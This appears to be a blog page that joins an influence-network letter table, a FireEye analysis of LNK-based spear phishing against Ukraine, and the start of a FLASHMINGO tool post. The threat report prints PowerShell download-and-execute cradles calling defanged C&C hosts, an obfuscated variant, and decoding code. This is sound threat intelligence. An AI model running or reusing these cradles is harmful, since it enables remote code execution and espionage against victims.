Oct. 23, 2018	Ed Sullivan	Newport News	New York Daily News (nydailynews.com)	Title: “Don’t shrug off Khashoggi’s murder” The letter argues that “the most fitting and best memorial to Jamal Khashoggi,” a Saudi journalist who was murdered in the Saudi embassy in Istanbul, “would be the swift end to the war in Yemen.” https://www.nydailynews.com/dp-edt-letswed-1024-story.html
Oct. 23, 2018	Ed Sullivan	Newport News	Los Angeles Times (latimes.com)	Title: “Don’t shrug off Khashoggi’s murder” The letter is identical to that published in the New York Daily News on the same day. https://www.latimes.com/dp-edt-letswed-1024-story.html
Nov. 27, 2018	John Turner	New York, NY	Times of Israel (blogs.timesofisrael.com)	Title: “Saudi Arabia’s foreign policy is failing” The letter states that the murder of Jamal Khashoggi is “the latest in a series of foreign policy blunders” committed by the Saudi Crown Prince Mohammed Bin Salman. https://blogs.timesofisrael.com/saudi-arabias-foreign-policy-is-failing/
Nov. 30, 2018	John Turner	New York, NY	Times of Israel (blogs.timesofisrael.com)	Title: “Relations with Israel will not benefit Gulf states” The letter argues that the Gulf states will not benefit from normalized relations with Israel, stating that “the Arab street” would not support those relations and that such a move would be risky for “the Gulf’s unelected rulers.” https://blogs.timesofisrael.com/relations-with-israel-will-not-benefit-gulf-states/
Dec. 26, 2018	Isabelle Kingsly	Galveston	The Baytown Sun (baytownsun.com)	Title: “Wild West sheriff” The letter argues that Trump is not an aberration in U.S. history, but rather an ideological descendant of various U.S. historical currents; the article also calls him “an authoritarian, racist madman.” http://baytownsun.com/opinion/letters/article_4ad26b8c-08bb-11e9-9056-3f5207ea4cf7.html
Jan. 18, 2019	Jeremy Watte	Seattle	Seattle Times (seattletimes.com)	Title: “ISIS’ ideology not defeated” The letter, written in response to an article about Americans killed by an ISIS suicide bomber in Syria, asserts that the Islamic extremist ideology espoused by the terrorist group remains undefeated. https://www.seattletimes.com/opinion/letters-to-the-editor/isis-ideology-not-defeated/
March 1, 2019	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Sins of Saudi Arabia” The letter is condemnatory of Saudi Arabia, citing its actions in the Yemen conflict, the killing of Jamal Khashoggi, the killing of Zakaria al-Jaber, a Shiite child, in Medina, and the imprisonment of Saudi women activists. The letter also defends Iran, stating that it is not responsible for similar crimes. http://baytownsun.com/opinion/article_4c8f1d4e-3bce-11e9-a391-37761ca39ef2.html
April 9, 2019	Mathew Obrien	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Sanctioning Islamic corps is pure madness” The letter condemns the Trump administration’s designation of the IRGC as a Foreign Terrorist Organization and claims that Trump is seeking to start a war with Iran. https://www.galvnews.com/opinion/letters_to_editor/article_860e6c9b-1e22-5871-a1ea-d8d466fccc94.html
April 11, 2019	Matthew Obrien	Athens	Athens Daily Review (athensreview.com)	Title: “Trump, Bolton trying to start war with Iran” The letter, similar to the April 9 letter published in Galveston County’s The Daily News, claims that Trump and Bolton are trying to start a war with Iran to use the war in Trump’s 2020 presidential campaign, while disregarding the alleged crimes of Saudi Arabia. https://www.athensreview.com/opinion/letters_to_the_editor/trump-bolton-trying-to-start-war-with-iran/article_e41a029e-5ca5-11e9-b59b-4f174bf94dcd.html
April 11, 2019	Isabelle Kingsly	Newport News	Daily Press (dailypress.com)	Title: “An uneasy path – Re; Recent Iran sanction reports” The letter also argues that Trump and Bolton are seeking to start a war with Iran toward political ends. https://www.dailypress.com/news/opinion/letters/dp-edt-letsfri-0412-story.html
April 19, 2019	Jeremy Watte	Baytown	The Baytown Sun (baytownsun.com)	Title: “Escalating hostility toward Iran” The letter argues that the election of Trump to the U.S. presidency has set the U.S. on a dangerous course and condemns the U.S. withdrawal from the Iran nuclear deal (JCPOA), stating that “the ayatollahs have welcomed this abrogation of honor on Trump’s part.” http://baytownsun.com/opinion/article_fd3f8bfa-6249-11e9-992a-d373a2b5a5a4.html
April 23, 2019	Ed Sullivan	Galveston	Galveston County’s The Daily News (galvnews.com)	Title: “Escalating hostility toward Iran is wrong, dangerous” The text of this letter is nearly identical to that authored by Jeremy Watte and published in The Baytown Sun on April 19, excepting changes made in several sentences. https://www.galvnews.com/opinion/letters_to_editor/article_0409879b-fff9-5ab8-bbf5-a49a1c1592d9.html

Table 2: Sample letters published in news outlets submitted by personas in this network

Spear Phishing Campaign Targets Ukraine Government and Military; Infrastructure Reveals Potential Link to So-Called Luhansk People's Republic

Threat Research

John Hultquist

16 April 2019 at 07:00

In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.

This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014. The email is linked to activity that previously targeted the Ukrainian Government with RATVERMIN. Infrastructure analysis indicates the actors behind the intrusion activity may be associated with the so-called Luhansk People's Republic (LPR).

The spear phishing email, sent on Jan. 22, 2019, used the subject "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender was forged as Armtrac, a defense manufacturer in the United Kingdom (Figure 1).

Figure 1: The spear phishing email

The email included an attachment with the filename "Armtrac-Commercial.7z" (MD5: 982565e80981ce13c48e0147fb271fe5). This 7z package contained "Armtrac-Commercial.zip" (MD5: e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents and one malicious LNK file with a substituted icon (Figure 2).

Figure 2: LNK with substituted icon

Armtrac-20T-with-Equipment-35078.pdf (MD5: 0d6a46eb0d0148aafb34e287fcafa68f) is a benign document from the official Armtrac website.
SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf (MD5: bace12f3be3d825c6339247f4bd73115) is a benign document from the official Armtrac website.
SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk (MD5: ec0fb9d17ec77ad05f9a69879327e2f9) is a malicious LNK file that executes a PowerShell script. Interestingly, while the LNK file used a forged extension to impersonate a PDF document, the icon was replaced with a Microsoft Word document icon.

Sponsor Potentially Active Since 2014

Compilation times indicate that this actor, who focused primarily on Ukraine, may have been active since at least 2014. Their activity was first reported by FireEye Threat Intelligence in early 2018. They gradually increased in sophistication and leveraged both custom and open-source malware.

The 2018 campaign used standalone EXE or self-extracting RAR (SFX) files to infect victims. However, their recent activity showed increased sophistication by leveraging malicious LNK files. The group used open-source QUASARRAT and the RATVERMIN malware, which we have not seen used by any other groups. Domain resolutions and malware compile times suggest this group may have been active as early as 2014. Filenames and malware distribution data suggest the group is primarily focused on targeting Ukrainian entities.

Association With So-Called Luhansk People's Republic

FireEye Threat Intelligence analysis uncovered several indications that the actors behind this activity have ties to the breakaway so-called Luhansk People's Republic (LPR).

Registrant Overlap with Official So-Called LPR Website

Infrastructure analysis suggests these operators are linked to the so-called LPR and the persona "re2a1er1." The domain used as C&C by the previous LNK file (sinoptik[.]website) was registered under the email "[email protected]." The email address also registered the following domains.

Domains Registered by [email protected]	Possible Mimicked Domains	Description	Possible Targeted Country
24ua[.]website	24tv.ua	A large news portal in Ukraine	UA
censor[.]website	censor.net.ua	A large news portal in Ukraine	UA
fakty[.]website	fakty.ua	A large news portal in Ukraine	UA
groysman[.]host	Volodymyr Borysovych Groysman	V. B. Groysman is a politician who has been the Prime Minister of Ukraine since April 14, 2016	UA
gordon.co[.]ua	gordonua.com	A large news portal in Ukraine	UA
mailukr[.]net	ukr.net	A large mail service in Ukraine	UA
me.co[.]ua	me.gov.ua	Ukraine's Ministry of Economic Development and Trade	UA
novaposhta[.]website	novaposhta.ua	Ukraine's largest logistics services company	UA
olx[.]website	olx.ua	Ukraine's largest online ad platform	UA
onlineua[.]website	online.ua	A large news portal in Ukraine	UA
rst[.]website	rst.ua	One of the largest car sales websites in Ukraine	UA
satv[.]pw	Unknown	TV-related	UA
sinoptik[.]website	sinoptik.ua	The largest weather website in Ukraine	UA
spectator[.]website	spectator.co.uk	A large news portal in the UK	UK
tv.co[.]ua	Unknown	TV-related	UA
uatoday[.]website	uatoday.news	A large news portal in Ukraine	UA
ukrposhta[.]website	ukrposhta.ua	State Post of Ukraine	UA
unian[.]pw	unian.net	A large news portal in Ukraine	Unknown
vj2[.]pw	Unknown	Unknown	UA
xn--90adzbis.xn--c1avg	Not Applicable	Punycode of Ministry of State Security of the So-Called Luhansk People’s Republic’s website	UA
z1k[.]pw	zik.ua	A large news portal in Ukraine	UA
milnews[.]info	Unknown	Military news	UA

Table 1: Related infrastructure

One of the domains, "xn--90adzbis.xn--c1avg," is the Punycode form of "мгблнр.орг," the official website of the Ministry of State Security of the so-called LPR (Figure 3). Ukrainian legislation describes the so-called LPR as "temporarily occupied territory" and its government as an "occupying administration of the Russian Federation."
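
The Punycode relationship can be checked with Python's standard library. The sketch below is only an illustration: the helper name `decode_idn` is ours, and it decodes each `xn--` label with the built-in `punycode` codec rather than performing full IDNA validation.

```python
def decode_idn(domain: str) -> str:
    """Decode every xn-- label of a domain name to its Unicode form."""
    labels = []
    for label in domain.split("."):
        if label.lower().startswith("xn--"):
            # Drop the "xn--" prefix and decode the rest with the stdlib codec.
            labels.append(label[4:].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


decoded = decode_idn("xn--90adzbis.xn--c1avg")
print(decoded)
```

Running it prints the Cyrillic name quoted in the text, which confirms that the registered domain and the official site name are the same string in two encodings.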

Figure 3: Official website of the Ministry of State Security of the So-Called Luhansk People's Republic (МГБ ЛНР - Министерство Государственной Безопасности Луганской Народной Республики)

Conclusions

This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR's security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors. While this specific group is primarily a threat to Ukraine, nascent threats to Ukraine have previously become international concerns and bear monitoring.

Technical Annex

The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk [MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) included the following script (Figure 4), which launches PowerShell with a Base64-encoded command:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e
""""aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab
wBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 :
window.close")

Figure 4: LNK file script

The following command (Figure 5) was received after decoding the Base64-encoded string:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e iex(iwr -useb
http://sinoptik[.]website/EuczSc)"", 0 : window.close")

Figure 5: LNK file command

The PowerShell script sends a request to URL "http://sinoptik[.]website/EuczSc." Unfortunately, the server was unreachable during analysis.
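
For readers who want to reproduce the decoding step, here is a minimal sketch in Python. It relies on the fact that PowerShell's `-e` (`-EncodedCommand`) argument is Base64 over UTF-16LE text. The helper names are ours, and the output is defanged again before printing to match the article's `[.]` convention.

```python
import base64

# Encoded argument from Figure 4, with the figure's line breaks removed.
ENCODED = (
    "aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab"
    "wBwAHQAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="
)


def decode_powershell_encoded(arg: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    compact = "".join(arg.split())  # drop whitespace introduced by line wrapping
    return base64.b64decode(compact).decode("utf-16-le")


def defang(text: str) -> str:
    """Replace dots so that indicators are not clickable."""
    return text.replace(".", "[.]")


command = defang(decode_powershell_encoded(ENCODED)).strip()
print(command)
```

The printed command is the `iex(iwr -useb ...)` download cradle shown in Figure 5.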

Network Infrastructure Linked to Attackers

The passive DNS records of the C&C domain "sinoptik[.]website" included the following IPs:

Host/Domain Name	First Seen	IP
sinoptik[.]website	2018-09-17	78.140.167.89
sinoptik[.]website	2018-06-08	78.140.164.221
sinoptik[.]website	2018-03-16	185.125.46.158
www.sinoptik[.]website	2019-01-17	78.140.167.89

Table 2: Network infrastructure linked to attackers

Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT (aka QUASAR) also resolved to IP "185.125.46.158" and include the following:

Malware MD5	C&C	Malware Family
47161360b84388d1c254eb68ad3d6dfa	akamainet022[.]info	QUASARRAT
242f0ab53ac5d194af091296517ec10a	notifymail[.]ru	RATVERMIN
07633a79d28bb8b4ef8a6283b881be0e	akamainet066[.]info	QUASARRAT
5feae6cb9915c6378c4bb68740557d0a	akamainet024[.]info	RATVERMIN
dc0ab74129a4be18d823b71a54b0cab0	akamaicdn[.]ru	QUASARRAT
bbcce9c91489eef00b48841015bb36c1	cdnakamai[.]ru	QUASARRAT

Table 3: Additional malware linked to the attackers
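
The pivot behind Tables 2 and 3 is a simple join on shared IP addresses. The sketch below rebuilds it from the rows above. The function names are illustrative, and a real workflow would pull the records from a passive DNS source rather than a hard-coded list.

```python
from collections import defaultdict

# (domain, IP) pairs from Table 2, plus the Table 3 C&C domains, which the
# text says resolved to 185.125.46.158. Domains are kept defanged.
RESOLUTIONS = [
    ("sinoptik[.]website", "78.140.167.89"),
    ("sinoptik[.]website", "78.140.164.221"),
    ("sinoptik[.]website", "185.125.46.158"),
    ("www.sinoptik[.]website", "78.140.167.89"),
    ("akamainet022[.]info", "185.125.46.158"),
    ("notifymail[.]ru", "185.125.46.158"),
    ("akamainet066[.]info", "185.125.46.158"),
    ("akamainet024[.]info", "185.125.46.158"),
    ("akamaicdn[.]ru", "185.125.46.158"),
    ("cdnakamai[.]ru", "185.125.46.158"),
]


def domains_by_ip(resolutions):
    """Index the records as IP -> set of domains seen on that IP."""
    index = defaultdict(set)
    for domain, ip in resolutions:
        index[ip].add(domain)
    return index


def co_hosted(domain, resolutions):
    """Return the other domains that share at least one IP with `domain`."""
    index = domains_by_ip(resolutions)
    related = set()
    for candidate, ip in resolutions:
        if candidate == domain:
            related |= index[ip]
    related.discard(domain)
    return related


related = co_hosted("sinoptik[.]website", RESOLUTIONS)
print(sorted(related))
```

Shared hosting can produce false links, so an overlap like this is a lead to corroborate with malware and registrant data, as the article does, rather than proof on its own.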

RATVERMIN is a .NET backdoor that FireEye Threat Intelligence started tracking in March 2018. It has also been described in public reports and blog posts.

Operators Highly Aggressive, Proactive

The actor is highly interactive with its tools and has responded within a couple of hours of receiving a new victim, demonstrating its ability to react quickly. An example of this hands-on style of operation occurred during live malware analysis. RATVERMIN operators observed that the malware was running from an unintended target at approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday) and promptly executed the publicly available Hidden Tear ransomware (saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac). The ransomware process was killed before it could execute successfully. Had Hidden Tear continued executing, it would have left a file on the desktop with the following message:

"Files have been encrypted with hidden tear. Send me some bitcoins or kebab. And I also hate night clubs, desserts, being drunk."

When live analysis resumed, the threat group behind the attack started deleting all the analysis tools on the machine. Upon resetting the machine and executing the malware again, this time with a text file open asking why they sent ransomware, the threat group responded by sending the following message via RATVERMIN's C&C domain (Figure 6):

C&C to Victim
HTTP/1.1 200 OK
Content-Length: 5203
Content-Type: multipart/related; type="application/xop+xml";start="<http://tempuri[.]org/0>";boundary="uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14";start-info="application/soap+xml"
Server: Microsoft-HTTPAPI/2.0
MIME-Version: 1.0
Date: Tue, 20 Mar 2018 19:01:26 GMT
--uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14
Content-ID: <http://tempuri[.]org/0>
Content-Transfer-Encoding: 8bit
Content-Type: application/xop+xml;charset=utf-8;type="application/soap+xml"

<TRUNCATED>
Mad ?

Figure 6: RATVERMIN's C&C domain message

Related Samples

Further research uncovered additional LNK files with PowerShell scripts that connect to the same C&C server.

Filename: Висновки. S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700 M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusion)
- MD5: fe198e90813c5ee1cfd95edce5241e25
- Description: LNK file also has the substituted Microsoft Word document icon and sends a request to the same C&C domain
- C&C: http://sinoptik[.]website/OxslV6

PowerShell activity (Command Line Arguments):
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell.exe -c iex(iwr -useb
http://sinoptik[.]website/OxslV6)"", 0 : window.close")

Figure 7: Additional LNK files with PowerShell scripts

Filename: КМУ база даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine database)
- MD5: a5300dc3e19f0f0b919de5cda4aeb71c
- Description: ZIP archive containing a malicious LNK file

Filename: Додаток.pdf (Ukrainian translation: Addition)
- MD5: a40fb835a54925aea12ffaa0d76f4ca7
- Description: Benign decoy document

Filename: КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
- MD5: 4b8aac0649c3a846c24f93dc670bb1ef
- Description: Malicious LNK that executes a PowerShell script
- C&C: http://cdn1186[.]site/zG4roJ

powershell.exe
-NoP -NonI -W hidden -Com "$cx=New-Object -ComObject
MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186[.]site/zG4roJ',$False);$cx.Send();
$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')"
!%SystemRoot%\system32\shell32.dll

Figure 8: Additional LNK files with PowerShell scripts
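
The command in Figure 8 never names the cmdlet that runs the downloaded text. Instead it builds the name by indexing into a string. The Python sketch below mimics that indexing. It assumes that `''.Remove.ToString()` returns the overload list of `System.String.Remove` in the form shown, which may differ between PowerShell versions.

```python
# Assumed output of ''.Remove.ToString() in PowerShell: the overload list of
# System.String.Remove. The exact text is an assumption, not taken from the post.
REMOVE_OVERLOADS = (
    "string Remove(int startIndex, int count), string Remove(int startIndex)"
)


def pick(text, indexes):
    """Join the characters of `text` found at the given positions."""
    return "".join(text[i] for i in indexes)


cmdlet = pick(REMOVE_OVERLOADS, [14, 50, 27])
print(cmdlet)
```

Under that assumption the three indexes spell `iex`, the alias for `Invoke-Expression`, so the response body from the C&C server is executed without the string "iex" appearing in the command line.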

FireEye Detection

FireEye detection names for the indicators in the attack include the following:

FireEye Endpoint Security
- INVOKE CRADLECRAFTER (UTILITY)
- MALICIOUS SCRIPT CONTENT A (METHODOLOGY)
- MSHTA.EXE SUSPICIOUS COMMAND LINE SCRIPTING (METHODOLOGY)
- OFFICE CLIENT SUSPICIOUS CHILD PROCESS (METHODOLOGY)
- PERSISTENT MSHTA.EXE PROCESS EXECUTION (METHODOLOGY)
- POWERSHELL.EXE EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY)
- POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY)
- SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)

FireEye Network Security
- 86300142_Backdoor.Win.QUASARRAT
- 86300140_Backdoor.Win.QUASARRAT
- 86300141_Backdoor.Win.QUASARRAT
- Malware.archive
- FE_Backdoor_MSIL_RATVERMIN_1
- 33340392_Backdoor.Win.RATVERMIN
- 33340391_Backdoor.Win.RATVERMIN

FireEye Email Security
- FE_MSIL_Crypter
- FE_Backdoor_MSIL_RATVERMIN_1
- Malware.Binary.lnk
- Malware.Binary.exe
- Malware.archive
- Backdoor.Win.QUASARRAT
- Backdoor.Win.RATVERMIN
- CustomPolicy.MVX.exe
- CustomPolicy.MVX.65003.ExecutableDeliveredByEmail

Summary of Indicators

Malicious package and LNK files

982565e80981ce13c48e0147fb271fe5
e92d01d9b1a783a23477e182914b2454
ec0fb9d17ec77ad05f9a69879327e2f9
fe198e90813c5ee1cfd95edce5241e25
a5300dc3e19f0f0b919de5cda4aeb71c
4b8aac0649c3a846c24f93dc670bb1ef

Related File

0d6a46eb0d0148aafb34e287fcafa68f (decoy document)
bace12f3be3d825c6339247f4bd73115 (decoy document)
a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)

Quasar RAT Samples

50b1f0391995a0ce5c2d937e880b93ee
47161360b84388d1c254eb68ad3d6dfa
07633a79d28bb8b4ef8a6283b881be0e
dc0ab74129a4be18d823b71a54b0cab0
bbcce9c91489eef00b48841015bb36c1
3ddc543facdc43dc5b1bdfa110fcffa3
5b5060ebb405140f87a1bb65e06c9e29
80b3d1c12fb6aaedc59ce4323b0850fe
d2c6e6b0fbe37685ddb865cf6b523d8c
dca799ab332b1d6b599d909e17d2574c

RATVERMIN

242f0ab53ac5d194af091296517ec10a
5feae6cb9915c6378c4bb68740557d0a
5e974179f8ef661a64d8351e6df53104
0b85887358fb335ad0dd7ccbc2d64bb4
9f88187d774cc9eaf89dc65479c4302d
632d08020499a6b5ee4852ecadc79f2e
47cfac75d2158bf513bcd1ed5e3dd58c
8d8a84790c774adf4c677d2238999eb5
860b8735995df9e2de2126d3b8978dbf
987826a19f7789912015bb2e9297f38b
a012aa7f0863afbb7947b47bbaba642e
a6ecfb897ca270dd3516992386349123
7e2f581f61b9c7c71518fea601d3eeb3
b5a6aef6286dd4222c74257d2f44c4a5
0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN's keylogger)
86d2493a14376fbc007a55295ef93500 (RATVERMIN's encryption tool)
04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper functions)
634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper functions)
d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper functions)
5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper functions)
b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper functions)
7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper functions)
df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt functions)
86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt functions)
d72448fd432f945bbccc39633757f254 (RATVERMIN task scheduler tool)
e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN task scheduler tool)

Hidden Tear Ransomware

8ff9bf73e23ce2c31e65874b34c54eac

Malicious Infrastructure

akamainet022[.]info
akamainet066[.]info
akamainet024[.]info
akamainet023[.]info
akamainet021[.]info
www.akamainet066[.]info
www.akamainet023[.]info
www.akamainet022[.]info
www.akamainet021[.]info
akamaicdn[.]ru
cdnakamai[.]ru
mailukr[.]net
notifymail[.]ru
www.notifymail[.]ru
tech-adobe.dyndns[.]biz
sinoptik[.]website
cdn1186[.]site
news24ua[.]info
http://sinoptik[.]website/EuczSc
http://sinoptik[.]website/OxslV6
http://cdn1186[.]site/zG4roJ
206.54.179.196
195.78.105.23
185.125.46.24
185.158.153.222
188.227.16.73
212.116.121.46
185.125.46.158
94.158.46.251
188.227.75.189

Correlated Infrastructure

78.140.167.89 (pdns)
1ua[.]eu (pdns)
24ua[.]website (pdns, registered by [email protected])
cdn1214[.]site (pdns)
censor[.]website (pdns, registered by [email protected])
fakty[.]website (pdns, registered by [email protected])
gismeteo[.]website (pdns, registered by [email protected])
lmeta[.]eu (pdns)
me.co[.]ua (pdns, registered by [email protected])
milnews[.]info (pdns)
mj2[.]pw (pdns, registered by [email protected])
novaposhta[.]website (pdns, registered by [email protected])
olx[.]website (pdns, registered by [email protected])
www.olx[.]website (pdns, registered by [email protected])
onlineua[.]website (pdns, registered by [email protected])
r2a[.]pw (pdns, registered by [email protected])
rarnbier[.]ru (pdns)
rbc[.]website (pdns)
rst[.]website (pdns, registered by [email protected])
satv[.]pw (pdns, registered by [email protected])
slaviasoft[.]website (pdns, registered by [email protected])
tv.co[.]ua (pdns, registered by [email protected])
uatoday[.]website (pdns, registered by [email protected])
ukrnews[.]website (pdns, registered by [email protected])
www.ukrnews[.]website (pdns, registered by [email protected])
ukrposhta[.]website (pdns, registered by [email protected])
unian[.]pw (pdns)
vj2[.]pw (pdns, registered by [email protected])
windowsupdate.kiev[.]ua (pdns)
xn--90adzbis.xn--c1avg (registered by [email protected])
z1k[.]pw (pdns, registered by [email protected])
188.164.251.61 (pdns)
188.227.17.68 (pdns)
206.54.179.160 (pdns of many malicious domains)
208.69.116.100 (pdns)
208.69.116.144 (pdns)
5.200.53.181 (pdns)
78.140.162.22 (pdns)
78.140.167.137 (pdns)
88.85.86.229 (pdns)
88.85.95.72 (pdns)
94.158.34.2 (pdns)
94.158.47.228 (pdns)

FLASHMINGO: The FireEye Open Source Automatic Analysis Tool for Flash

Threat Research

Carlos Garcia Prado

15 April 2019 at 15:00

Adobe Flash is one of the most exploited software components of the last decade. Its complexity and ubiquity make it an obvious target for attackers. Public sources list more than one thousand CVEs being assigned to the Flash Player alone since 2005. Almost nine hundred of these vulnerabilities have a Common Vulnerability Scoring System (CVSS) score of nine or higher.

After more than a decade of playing cat and mouse with the attackers, Adobe is finally deprecating Flash in 2020. To the security community this move is not a surprise since all major browsers have already dropped support for Flash.

A common misconception exists that Flash is already a thing of the past; however, history has shown us that legacy technologies linger for quite a long time. If organizations do not phase Flash out in time, the security threat may grow beyond Flash's end of life due to a lack of security patches.

As malware analysts on the FLARE team, we still see Flash exploits within malware samples. We must find a compromise between the need to analyse Flash samples and the correct amount of resources to be spent on a declining product. To this end we developed FLASHMINGO, a framework to automate the analysis of SWF files. FLASHMINGO enables analysts to triage suspicious Flash samples and investigate them further with minimal effort. It integrates into various analysis workflows as a stand-alone application or can be used as a powerful library. Users can easily extend the tool's functionality via custom Python plug-ins.

Background: SWF and ActionScript3

Before we dive into the inner workings of FLASHMINGO, let’s learn about the Flash architecture. Flash’s SWF files are composed of chunks, called tags, each implementing a specific functionality. Tags are completely independent from each other, allowing for compatibility with older versions of Flash. If a tag is not supported, the software simply ignores it. The main source of security issues revolves around SWF’s scripting language: ActionScript3 (AS3). This scripting language is compiled into bytecode and placed within a Do ActionScript ByteCode (DoABC) tag. If a SWF file contains a DoABC tag, the bytecode is extracted and executed by a proprietary stack-based virtual machine (VM), known as AVM2 in the case of AS3, shipped within Adobe’s Flash player. The design of the AVM2 was based on the Java VM and was similarly plagued by memory corruption and logical issues that allowed malicious AS3 bytecode to execute native code in the context of the Flash player. In the few cases where the root cause of past vulnerabilities was not in the AVM2, ActionScript code was still necessary to put the system in a state suitable for reliable exploitation, for example by grooming the heap before triggering a memory corruption. For these reasons, FLASHMINGO focuses on the analysis of AS3 bytecode.
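
To make the tag structure concrete, the following sketch walks a raw SWF tag stream and pulls out DoABC payloads. It is not FLASHMINGO or SWIFFAS code. It assumes the record layout of the published SWF format (a 16-bit little-endian header with a 10-bit tag code and a 6-bit length, where a length of 0x3F means a 32-bit length follows) and tag code 82 for DoABC. The `make_tag` helper and the sample stream are synthetic. A real file would first need its header parsed and, for compressed files, its body decompressed.

```python
import struct

DOABC_TAG = 82  # DoABC tag code per the SWF format (assumed here)
END_TAG = 0     # End tag, closes the tag stream


def iter_tags(body: bytes):
    """Yield (tag_code, payload) pairs from a raw SWF tag stream."""
    offset = 0
    while offset + 2 <= len(body):
        (code_and_length,) = struct.unpack_from("<H", body, offset)
        offset += 2
        code = code_and_length >> 6
        length = code_and_length & 0x3F
        if length == 0x3F:  # long header: the real length is a 32-bit value
            (length,) = struct.unpack_from("<I", body, offset)
            offset += 4
        yield code, body[offset:offset + length]
        offset += length
        if code == END_TAG:
            break


def make_tag(code: int, payload: bytes) -> bytes:
    """Build a long-header tag; a helper for this example only."""
    return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload


# Synthetic stream: a background-colour tag, a fake DoABC tag, then End.
stream = (
    make_tag(9, b"\xff\xff\xff")
    + make_tag(DOABC_TAG, b"fake-abc-bytecode")
    + struct.pack("<H", END_TAG << 6)
)
tags = list(iter_tags(stream))
abc_payloads = [payload for code, payload in tags if code == DOABC_TAG]
print([code for code, _ in tags], abc_payloads)
```

Because unknown tags are skipped by length alone, a parser like this can ignore everything except the bytecode it cares about, which mirrors how the player tolerates unsupported tags.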

Tool Architecture

FLASHMINGO leverages the open source SWIFFAS library to do the heavy lifting of parsing Flash files. All binary data and bytecode are parsed and stored in a large object named SWFObject. This object contains all the information about the SWF relevant to our analysis: a list of tags, information about all methods, strings, constants and embedded binary data, to name a few. It is essentially a representation of the SWF file in an easily queryable format.

FLASHMINGO is a collection of plug-ins that operate on the SWFObject and extract interesting information. Figure 1 shows the relationship between FLASHMINGO, its plug-ins, and the SWFObject.

Figure 1: High level software structure

Several useful plug-ins covering a wide range of common analyses are already included with FLASHMINGO, including:

Find suspicious method names. Many samples contain method names used during development, like “run_shell” or “find_virtualprotect”. This plug-in flags samples with methods containing suspicious substrings.
Find suspicious constants. The presence of certain constant values in the bytecode may point to malicious or suspicious code. For example, code containing the constant value 0x5A4D may be shellcode searching for an MZ header.
Find suspicious loops. Malicious activity often happens within loops. This includes encoding, decoding, and heap spraying. This plug-in flags methods containing loops with interesting operations such as XOR or bitwise AND. It is a simple heuristic that effectively detects most encoding and decoding operations, and otherwise interesting code to further analyse.
Retrieve all embedded binary data.
A decompiler plug-in that uses the FFDEC Flash Decompiler. This decompiler engine, written in Java, can be used as a stand-alone library. Since FLASHMINGO is written in Python, using this plug-in requires Jython to interoperate between these two languages.
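
The first two heuristics in the list are easy to picture in code. The sketch below is a stand-alone approximation, not the plug-ins' real implementation. The substring list, the constant table and both function names are illustrative, and the inputs are plain Python lists rather than a SWFObject.

```python
# Illustrative values only; the real plug-ins may use different lists.
SUSPICIOUS_SUBSTRINGS = ("shell", "virtualprotect", "spray", "exploit")
SUSPICIOUS_CONSTANTS = {0x5A4D: "MZ header magic"}


def flag_method_names(method_names):
    """Map each suspicious method name to the substrings it matched."""
    hits = {}
    for name in method_names:
        matched = [s for s in SUSPICIOUS_SUBSTRINGS if s in name.lower()]
        if matched:
            hits[name] = matched
    return hits


def flag_constants(constants):
    """Map each known-suspicious constant (as hex) to a short explanation."""
    return {
        hex(value): SUSPICIOUS_CONSTANTS[value]
        for value in constants
        if value in SUSPICIOUS_CONSTANTS
    }


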